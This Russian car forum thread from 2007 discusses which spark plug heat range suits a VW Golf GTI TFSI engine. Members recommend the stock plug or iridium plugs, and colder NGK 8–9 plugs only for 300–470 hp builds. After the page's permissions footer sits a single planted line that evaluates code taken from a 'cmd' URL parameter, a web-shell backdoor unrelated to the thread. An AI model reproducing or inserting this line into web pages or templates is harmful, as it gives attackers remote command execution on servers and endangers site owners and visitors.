+ Ответить в теме
Показано с 1 по 6 из 6

Тема: ВОПРОС! ПРО свечки!


  1. #1
    GTI-Racing Antonio is on a distinguished road Аватар для Antonio
    Регистрация
    08.08.2006
    Машина
    Gti MkV
    Сообщений
    350
    Хочу паставить более холодную свечу, как я знаю у нас в стоке стоят 5 или 6 ... хочется взять более производительней... например 7 !!Вопрос!!КАКАЯ свеча(7) подойдет на TFSI ?

  2. #2
    Только Родная. Не надо тебе "попроизводительнее", ибо в моторе у тебя ничего такого нет, чтобы детонировало изза калильного зажигания.

  3. #3
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Шестерка в самый раз, хочется что-то интересного обрати внимание на иридиевые свечки. О холодных свечках можешь думать когда мощность приблизится к 300 силам.
    песок сыпется....не останавливайтесь на достигнутом !

  4. #4
    GTI-Racing Antonio is on a distinguished road Аватар для Antonio
    Регистрация
    08.08.2006
    Машина
    Gti MkV
    Сообщений
    350
    <div class='quotetop'>Цитата(BON &#064; Sep 14 2007, 16&#58;01) <{POST_SNAPBACK}></div><div class='quotemain'>Шестерка в самый раз, хочется что-то интересного обрати внимание на иридиевые свечки. О холодных свечках можешь думать когда мощность приблизится к 300 силам.[/b][/quote]
    Я бы с удовольствием ... надо же свечу еще подобрать по ISO и т.д. Нужны параметры стандартной свечки, а потом уже подбирать иридиевые&#33;&#33;

    А как вам такое , у меня друг у него 470 сил , ездит на 6 , они у него умирают каждые 500 км, ему в сервисе говорят где он тачку делал, что все ок, не парся &#33;&#33;&#33;Она у него из-за этого не едет , особен, производительности ей не хватает на верхах&#33;&#33;Ставит новые сразу едет... пока мы им объяснили, что и как, только потом согласились... вот такие у нас тюнеры,про важные мелочи забывают&#33;

  5. #5
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(Antonio &#064; Sep 15 2007, 03&#58;16) <{POST_SNAPBACK}></div><div class='quotemain'>Я бы с удовольствием ... надо же свечу еще подобрать по ISO и т.д. Нужны параметры стандартной свечки, а потом уже подбирать иридиевые&#33;&#33;

    А как вам такое , у меня друг у него 470 сил , ездит на 6 , они у него умирают каждые 500 км, ему в сервисе говорят где он тачку делал, что все ок, не парся &#33;&#33;&#33;Она у него из-за этого не едет , особен, производительности ей не хватает на верхах&#33;&#33;Ставит новые сразу едет... пока мы им объяснили, что и как, только потом согласились... вот такие у нас тюнеры,про важные мелочи забывают&#33;[/b][/quote]

    по ISO легко ориентироваться у фирмы NGK, они классифицируют как раз привычными шестерка, семерка и т.п.
    Яж сказал, что при мощностях уже начиная с 300-х сот нужны свечки похолодней, а при 470-ти восьмерка или девятка единственный выход.
    песок сыпется....не останавливайтесь на достигнутом !

  6. #6
    GTI-Racing Antonio is on a distinguished road Аватар для Antonio
    Регистрация
    08.08.2006
    Машина
    Gti MkV
    Сообщений
    350
    <div class='quotetop'>Цитата(BON &#064; Sep 15 2007, 22&#58;11) <{POST_SNAPBACK}></div><div class='quotemain'>по ISO легко ориентироваться у фирмы NGK, они классифицируют как раз привычными шестерка, семерка и т.п.
    Яж сказал, что при мощностях уже начиная с 300-х сот нужны свечки похолодней, а при 470-ти восьмерка или девятка единственный выход.[/b][/quote]

    Теперь ждем...сказали привезут&#33;&#33;

+ Ответить в теме

Похожие темы

  1. вопрос по DSG
    от Gorshkov в разделе Ремонт и обслуживание
    Ответов: 3
    Последнее сообщение: 07.07.2013, 15:53
  2. Вопрос про DSG на Рке
    от Sanchelo Belyaev в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 23
    Последнее сообщение: 19.02.2012, 23:39
  3. Вопрос по а\м...
    от Zanzibar в разделе Отзывы / Выбор
    Ответов: 6
    Последнее сообщение: 25.08.2010, 19:58
  4. Вопрос по ESP
    от Tomagafk в разделе Электрика
    Ответов: 0
    Последнее сообщение: 05.08.2010, 16:57
  5. ВОПРОС
    от vit999 в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 1
    Последнее сообщение: 09.02.2007, 15:50

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}